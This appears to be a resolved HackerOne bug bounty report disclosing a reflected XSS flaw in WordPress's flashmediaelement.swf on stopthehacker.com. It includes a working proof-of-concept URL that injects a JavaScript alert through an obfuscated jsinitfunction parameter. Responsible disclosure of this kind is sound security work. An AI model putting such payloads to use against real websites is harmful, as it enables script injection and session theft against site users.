Wordpress flashmediaelement.swf XSS on stopthehacker.com
Unknown
Vulnerability Details
Hi,
It appears that the domain stopthehacker.com has an XSS vulnerability, specifically in flashmediaelement.swf.
PoC:
https://www.stopthehacker.com/wp-includes/js/mediaelement/flashmediaelement.swf?jsinitfunctio%gn=alert`PoC%20PoC%20PoC`
Please see the attached screen shot for the alert box returned.
Kind regards!
Actions
View on HackerOneReport Stats
- Report ID: 137964
- State: Closed
- Substate: resolved
- Upvotes: 5